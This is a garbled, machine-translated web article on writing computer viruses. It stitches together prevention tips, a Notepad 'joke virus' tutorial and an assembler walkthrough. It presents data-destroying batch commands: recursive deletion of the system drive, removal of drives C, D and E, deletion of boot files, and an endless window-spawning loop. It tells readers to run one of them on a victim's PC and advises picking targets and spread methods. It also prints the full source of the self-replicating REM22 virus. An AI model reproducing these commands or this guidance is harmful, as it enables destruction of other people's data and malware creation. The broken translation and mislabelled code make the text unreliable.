How do viral programs write. How to create a virus joke using notepad. What is a virus?

This software, the purpose of which is to obtain unauthorized access to computer resources or information on your hard drive. Often created to do harm by copying, distorting, deleting, replacing information. Further we will consider how to create a virus-joke, to protect ourselves from viruses.

What is a virus?

Before you create a virus, you need to determine exactly what it is. For a program to be considered malicious, it must:

• destroy information or disrupt the computer;
• run without warning;
• have the explicit purpose of unauthorized access or destruction of information.

Computer viruses must meet all of the above criteria. For example, a copy protection cracker is not a malicious program. It does not destroy files, but only selects a password to unlock. Also, a disk formatting program cannot be considered malicious. It destroys data on the computer, but is performed with the consent of the user. If a program destroys information due to internal errors, it is also not considered a virus. Although developers may be responsible for neglecting work or as violators of consumer rights, the program could delete important data. In general, clear criteria have not yet been determined. In order for the program to be considered a virus, software and hardware expertise is carried out.

Types of viruses

Why create viruses? There are many reasons. One part of the malicious files is really dangerous and can damage the health of the machine, the other is harmful indirectly. List of main goals:

1. Destabilization.
2. Installing other malware.
3. Theft, fraud, espionage.
4. Adware.
5. Misc.

Computer viruses interfere, it can be a causeless opening and closing of a drive, hardware failure.

Some programs behave quite cunningly. Downloading media from an infected link may result in malware downloading.

To steal any information, a hard disk scan, registration of keystrokes, and redirection of a user to a fake site are used. So, accounts are stolen and used to send spam, payment systems are hacked, computers are blocked to extort money. This is sometimes paid software that, after downloading, does nothing useful.

Due to the damaged file, a public proxy server can be organized on the computer, the machine will become a member of the botnet and will be used to conduct DDOS attacks. With the popularization of Bitcoin, cases of hidden mining on users' PCs have become more frequent.

There are also programs that show ads or collect various information for marketing purposes.

How to create viruses

In Notepad (or rather, in any text editor), you can create a malicious program, and you can do this in the same way as ordinary programs create. Any programming languages \u200b\u200bare used. Usually, this is C ++, but it can be Delphi and .Net. The goal of creating a virus can be a joke or an introduction to how it works. A simple program is written right in Notepad, and the code itself takes up very few lines.

You can completely eliminate the virus from entering the computer provided that you disconnect the Internet and refuse to use illegal software. Files containing viruses can function without an internet connection. In this case, they will harm the information on the user's hard drive or cause the program to work incorrectly.

Today, the main goal of hackers is not the development of destructive programs that clearly harm the system, but the creation of products that behave quietly. They can work for a long time and at one point cause very serious harm.

Signs of infection

Before creating a virus, attackers analyze all the ways in which it can be detected, try to get around them. Antiviruses effectively detect malicious files, but by mistake of a user, some of them can be added to exceptions. In order to react in time that the computer is infected, you need to track suspicious and strange actions.

The most obvious signs of infection:

• opening windows with unfamiliar content;
• blocking access to sites;
• third-party processes in the "Task Manager";
• new entries in startup;
• the inability to make changes to the computer settings;
• accidentally restarting the computer or shutting down.

Some of the symptoms can be caused by a joke virus and do not pose a clear threat to the system. And some of them are used to divert attention, while the main virus collects user data.

Virus spread

The attack has several stages. The first answers the question of how to create a virus, that is, this is a technological stage. The second is the delivery of malware to the computer. The main methods of spreading viruses:

• exploit exploits vulnerabilities in software, with the help of which it takes control of the system and disrupts its functioning;
• a logical bomb fires under a certain condition, it is inseparable from the host program into which it is integrated;
• a trojan program penetrates a computer under the guise of legal software, very often it is part of an entire planned multi-stage attack;
• worms spread independently through local and global networks; for this, errors in administration are used, as well as social engineering tools.

Prevention and treatment

There are antiviruses to protect against viruses. They qualitatively protect the system, but, as a rule, the user himself is to blame for the infection of the system. Therefore, you need:

• install updates in a timely manner, use licensed copies;
• run on a computer as a user, not an administrator;
• open computer files only from trusted sources;
• use a firewall.

How to make a joke virus

A virus is primarily a program that modifies the contents of any files. It is created in the same way as any other program. The simplest malware options can be created in Notepad. This does not require special skills or knowledge of programming languages.

How to create viruses in Notepad?

The following lines will create 1000 folders in one second, which will put the user in a stupor:

How to create a virus to steal passwords? It is already more difficult to answer this question. To do this, you need to consider how the user will launch the malicious file, how the data will be stolen. Only then can we start implementation. This is a very complex process. In addition, this may be illegal, so we do not recommend readers to create viruses for any purpose (except, of course, educational).

Joke viruses are simple programs that can be handed to a friend (or enemy), and he will think that his computer is hacked, infected with a virus or seriously damaged. Joke viruses can be written in a regular Notepad: you just need to write commands to the computer that slow down the computer, disable the operating system, or simply scare the user, and then make him run this file. Joke viruses can be anything from an annoying nuisance to a nightmare that disrupts the system. The “viruses” in this article are intended only for harmless jokes, the worst they can do is turn off the computer. Attention:   these joke viruses are designed only for computers running Windows, they will not work on Mac OS without special preparation. Let's start with step 1.

Steps

We write a fake virus that opens the "endless" windows

Launch Notepad.   Batch (.BAT) files contain commands for the computer in text form. In order to write a BAT file, you do not need a special editor - just Notepad from the standard set of Windows programs is enough. Notepad can be found in the Start menu or in the Accessories submenu. You can also open Notepad by pressing Win + R, in the text box of the dialog box that appears, type “notepad” and press Enter.

Type "@echo off" and then, from a new line, "CLS".   By default, .bat files open a command prompt window and display executable commands. The “@echo off” and “CLS” commands prevent commands from appearing on the command line window, making the reason for the joke invisible to the “victim”.

Write commands to open multiple (or infinite) windows.   Now it's time to write a sequence of commands, executing which, your fake virus will open many windows of different programs once or will tear off these windows indefinitely. It is important to know that if a lot of windows open endlessly, the computer may eventually freeze. Read on for how to make both types of “virus”:

• To open certain   number of windows, from a new line, type the following command in Notepad: start (program name). Instead of the phrase in brackets, enter the name of the program on the computer “victims” or   or the full name of the executable file. This command instructs the computer to open a window of the specified program. For instance, start iexplore.exe will open an Internet Explorer window. Repeat the “start” command as many times as you like, and your “virus” will open the window as many times as you specify. Here are a few programs that you can enter after the start command:
  • iexplore.exe - browser interent explorer
  • calc.exe - Calculator
  • notepad.exe - Notepad
  • winword.exe - Microsoft Word
• To open infinite   number of windows, first from a new line type : Aincluding a colon. On the next line, type start iexplore.exe   (or another program). And finally, type the line below goto A. This sequence of commands will cause the computer to open the Internet Explorer window (or any other program), return to the place immediately before the window opens, and then immediately open a new window until the command prompt window is closed or the computer freezes.

Find the operating system you want to attack.   Most often, these are Microsoft Windows, especially older versions. Many users do not update their operating systems, leaving them vulnerable to modern attacks.

• Mac OS X and Linux are considered more protected from virus attacks (associated with the operation of access rights and the architecture of the operating system). 95% of all viruses target Windows users.

Decide how to spread the virus.   The virus will be a virus if it can spread to other users. You need to come up with a delivery method before you begin work on creating the virus. Commonly used delivery components:

Find a weak spot to attack.   Successful viruses exploit weaknesses in programs and system security to work and spread. It takes a lot of research and knowledge, but there are specialized communities that can help with this.

Decide on the functionality of your virus.   What will the virus do after infecting the system? Effects can be different, ranging from a null effect, displaying a message, deleting files, and other, more harmful effects. Be aware that creating and spreading viruses is illegal in many countries.

Choose language.   To create a virus, you need at least a basic understanding of some programming language or scripting tool. More complex viruses very often include several programming languages. For the most efficient viruses, you will need assembler knowledge.

• If you want to create executable viruses, look for C and C ++ courses on the Internet.
• If you want to create macro viruses, then learn the macro language for the desired program, for example, Microsoft Office.
• Visual Basic can be used to create malware for Windows users.

DISCLAIMER

This article is written for educational purposes and the author is not responsible for your actions. Be prudent and appreciate the work of others.

How computer viruses are created | Bit of theory

Computer viruses   - a type of malicious software capable of creating copies of itself and introducing itself into the code of other programs, system memory areas, boot sectors, as well as distributing its copies through various communication channels.

Computer viruses have the following classifications:

• Boot viruses   - viruses that infiltrate the boot sector of data storage devices, such as hard drives, flash drives, floppy disks, etc., and which can violate the availability of files.
• File viruses   - the type of viruses that are embedded in executable files (files with the extension COM and EXE) and adversely affect their functionality.
• File boot viruses   - viruses that combine the functions of the two previous types of viruses;
• Document viruses   - A type of virus that infects office system files. This type is also called "macro viruses", because the infection of the system occurs through infection of the program macros.
• Network viruses   - the type of viruses that are spread through the use of a computer network, i.e. network services and protocols.

The most famous virus in the world was called ILOVEYOU. At its core, it was completely harmless, a worm that spammed people's mails. Recently, however, the world has been exposed to cyber attacks, which made everyone think about their safety. The WannaCry virus infected a lot of computers and demanded a ransom of $ 300 in bitcoins. However, some analysts believe that this was only a test and there will be another attack, of a much larger scale and it will be aimed at Apple users.

And yet, WannaCry, although it was widespread and had a lot of money from it, it was an ordinary WinLocker that could be removed. The fact is that in most banks and companies paid, which did not have time to understand, and $ 300 for them is not a serious loss.

We create comic viruses and not only

Let's create some of our viruses, which I do not recommend checking on my computer, as this can end very badly.

Absolutely everyone can create such viruses, since we do not need specialized software, etc., we just need a notepad.

I must say right away that in almost all cases we will save our file in the .bat format, I write the name anyname, but you can give absolutely anything.

Delete all files

We save this code as anyname.bat and everything, after launch, all contents will be deleted.

Blue screen of death

  @echo off del% systemdrive% *. * / f / s / q shutdown -r -f -t 00

We save this code in anyname.vbs file, note that here the file format must be .vbs, not .bat.

Format C, D, E discs in three seconds

rd / s / q D:
rd / s / q C:
rd / s / q E:

We save this file as anyname.bat and run it. Formatting all discs will occur in three seconds.

Matrix Effect | Matrix effect

@echo off
color 02: tricks
echo% random %% random %% random %% random %% random %% random %% random %% random%
goto tricks

We save as anyname.bat and run it, it is not dangerous for your PC.

Shutting down the PC and disabling the ability to reboot

  @echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo off Msg * YOU GOT INFECTED! Shutdown -s -t 7 -c "A virus is taking over c: Drive

Save as kind.bat, DANGEROUS START ON YOUR PC!

Replace files with broken ones

This virus will replace the following formats (.exe .jpeg .png .mpeg .sys)

  @echo off assoc .txt \u003d jpegfile

Save as anyname.bat and run.

Removing an operating system

  @echo off Del C: *. * | y

Save as anyname.bat and run on the victim's PC.

And that’s all today, thanks for reading the article and I hope you will not abuse the information received. If you want more viruses, then write in the comments, let's do it! Save the article on your social networks so as not to lose.

Good luck in life and see you soon!

"He rode somewhere for a long time in an uncomfortable tight packing, he was shaking and rocking, his body was demanding food. He did not understand why he, who had just been born, was thrown out of the house ... Finally, the shaking ceased, and someone else and the coarse one opened the archive attached to the letter. A young, curious virus popped out and made its first division ... "

In this article I will share the experience of virus writing. The basic principle of the activity of any virus can be expressed in a few words: the body of the virus during its execution is treated as a code, and during infection, as data. There are many types of viruses and various methods of infection. Naturally, the mechanism of action of the virus depends on the specific operating system. There are, for example, viruses that work in protected processor mode (maximum
  privileges and absolute addressing of all memory). Companies such as AVP have to spend a lot of time and resources on treating such instances. The only thing that saves the creators of antiviruses is a very small number of really professional viruses.

In order to learn how to write viruses yourself, you only need to know the basics of assembler. I mean, with initial knowledge, you can try to write your own viruses and explore existing ones. Other useful, and sometimes necessary,
  knowledge will come as you study other people's creations. From resources on this topic I can recommend a page containing a huge number of books and articles:
http://vx.netlux.org/lib_rus.shtml.
  All her documents are written in a very understandable and affordable way.
  language. There is also a well-known electronic magazine Infected Voice. It has a convenient navigation system that allows you to navigate in new materials (source codes and articles). This magazine is published once every half a year (at least it was earlier, now I’m not sure) and contains all the innovations in this area.

Suppose you find the source of a virus and want to explore it. How to do it? Honestly, I myself faced such a problem for the very first time. My question was this: there is a virus text, I want to see how it works, and at the same time I AM AFRAID OF IT! This is completely real: what will prevent the viruses from burning my CMOS or rubbing my screw? The answer is nothing. In case of your wrong actions, the virus can cause you that harm for which it is programmed. However, the algorithm for correct actions is quite simple. Now we will understand it.

We assume that the source code of the virus is written in assembler. This language is ideal for writing viruses. As you know, in
  assembler there are only two commands causing "real" (meaning actions that can produce
  irreversible changes on the hard drive or elsewhere) are "INT" and "OUT", all other commands work with processor registers and flags (although roughly enough, but by and large it’s true). We do not consider WIN API functions, since in principle they can be considered a replacement for DOS interrupts, and their call is a replacement for a command
  "INT".

A little help for beginners or those who have not written on acme for a long time: the "INT" command is used to call DOS or BIOS interrupts, and the "OUT" command is for writing data to the port. At the same time, for the “INT” command, the function number is indicated in the register AH (most often), and
  for the "OUT" command, the data written to the port is stored in the AL, AX, EAX registers.

So. Take any debugger. Since you first need to understand viruses under DOS (they still work under
  Win), any debugger will do: Turbo Debugger from Borland Inc., CodeView from MicroSoft, AFDPRO or AVPUTIL. Next, load the source into the debugger and trace it step by step. The main thing is to adhere ONLY ONE RULE. It can be called golden.
  ATTENTION: you can safely execute the source code of your virus, but as soon as you get to the "OUT" or "INT" commands, immediately stop and start the analysis.

You must analyze:

• the number of the called interrupt or recording port;
• number of the called function or data written to the port.

In order to deal with the real actions of these commands, use either Tech Help, or any dock on asmu, or
  a book. The main thing is that in your source you can find the info on all interrupts and ports.
  So you can understand what will do
  the next command without executing it on your computer. During tracing, record all data (state of registers, command addresses, data on
  called functions, etc.) on a piece of paper. Then, by the time you call the function (or write to the port), you will be fully armed and you will be able to determine what will happen if you execute the following command. It will also help you with a comparative analysis of changes in registers and flags.

After you understand what this or that team is doing ("INT" or "OUT"), skip it and go on until you
  You will meet the end of the file or the next such command. As a result, you will sort out any virus on the shelves and understand its functioning.

Let's look at an example. As one, I took a small virus written by a certain Reminder "om. I got it from the eleventh issue of Infected Voice" a. There he was without comment, so he had to do all the work himself. What me
  attracted in this creation: very small source code, very small size of the compiled executable, an incomprehensible (at first glance) algorithm. Here is its source code (by the way, it is called REM22):

Model tiny
  .code
  .startup
  start:
  pop cx
  hel:
  xchg ax, bx
  db 108h shr 1
  db 4eh; dec si
  db 9eh shr 1
  db 3ch; cmp al, xx
  db 100h shr 1
  db 40h
  fmask db "*. *", 0
  lodsw
  cwd
  mov dl, al
  shl dx, 1
  int 21h
  jmp hel
  end

This virus in my opinion is a masterpiece, since with such a small size
  to organize the mechanism of reproduction - work on the truth of genius. When we now analyze what and how he does, everything
  will fall into place. In the meantime, it should be noted: in principle, this virus does not carry any destructive actions (I think reproduction cannot be considered as such), but it infects all files
  in the same directory with him. It is not a "professional" virus, that is, it lacks many of the mechanisms characteristic of serious creations:

• there is no "friend / foe" mechanism (the virus infects everyone indiscriminately, even itself or already infected objects);
• infection occurs only in files in the same directory with it (try to compile it and run it in a folder where besides it
     there is not anyone:));
• the virus is not polymorphic (does not encrypt itself and does not change its code);
• the virus does not carry destructive actions;
• the virus is not resident.

Let's take a look to the inside of our
  overrieter. The source code is a model for creating an exe file. ".startup" is a TASM directive, but you can do without it, but then you have to write "org 100h" and then put a label (and
  at the end, after "end", put the name of the label). The rest of the teams can be easily found in any book and see what they do (do not be lazy). It remains only to figure out what these teams do together.

This masterpiece is an ordinary cycle, which is repeated 6 times. What happens in the loop? And what happens is that we call int 21h with six different functions (93, 4E, 3C, 40, 2E, 00). Watching
  in order, then:

"pop cx" - this is only for resetting cx (at the top of the stack, as you know, at the beginning of the program lies the zero). What for? And so that on the SUB CH command (look, it should be at offset 108h in the debugger) to get CH \u003d 01 (at offset 2Ah (this is somewhere in the PSP) FFh always lies), i.e. You can not show off and just write sub ch, ffh, but this will change the program code ... It turns out:
  *. *, 0 \u003d sub CH ,, and this is a ready-made mask for searching ... THERE IS WHERE GENIUS !!!

That is, sub ch, ffh is "Ae" (in ASCII codes with a space at the end). Further, everything that goes from offset 101 (code 93) to offset 10B (code 00) is FUNCTIONS FOR int 21h !!! Those. these are 6 functions that we call in turn in a loop (see above their numbers), and the code that is obtained is just tinsel. It has ABSOLUTELY NO SENSE! So it turned out, if you collect the functions of the contract. That is, if I write TANAT, then this will translate into a sequence of some commands, right? But this is essentially data ... although in this program you can’t call it data, it's just FUNCTIONS for int 21h, that's what
  GENIUS!!! There is no point in telling further - because in each of the six cycles the function is called, well, and all the registers are approximately
  tailored to ideals ... See:

The 93h function is called for the first time: Pipe (Error) - it DOES NOT DO ANY LOAD for the program itself, DOES NOT USE ANYTHING, IT'S SIMPLY EXCESSIVE, IT DOESN'T NEED, IT'S AN EXTRA CYCLE, BUT TAKING INTO ACCOUNT the genius of the code, it JUST APPEARS FROM HER NOW ANYWHERE !!! There will be another such "left" function - see below.

Second: 4Eh - this is what we need! Search for a file, and at the time of the call in dx is the file mask offset (108h) !!!

Third: 3Ch - file creation. This is another "left" function. She doesn’t need us. We do not need to create a file (because we only need to write ourselves to the file that we found in the previous step). In the DX lies some left trash, naturally with
  the file name has nothing in common, therefore CF \u003d 1 and we move on to the next cycle.

Fourth: 40h - Write to file. But this is what we need already! DX contains the offset 100h (i.e. the beginning of REM22), but CX failed a little - it is 400h, i.e. really to the beginning of the found file
  400h bytes will be written, while REM22 takes up only 22 bytes, i.e. 1002 extra bytes will be written. This is true. But given the genius of the code :), this can be forgiven.

Fifth: 2Eh - Set Verify Flag. This is the LEFT function, here it is simple - the appendix of the program.

Sixth: 00h - this is the way out of the program (I also did not know).

That's all: that is, we have 6 cycles, of which only 3 are meaningful: search, record and exit.
  Most likely you will be very much not
  point. To figure it out, load the source into the debugger, trace it, see
  for the status of the data in the registers, look at my comments. Then everything will become clear. Finally
  I bring the debugging table so that you do not compile it yourself (for one, and see how it should look). In principle, it alone should be enough,
  to understand what is happening in this virus, but I think the comments will not be superfluous.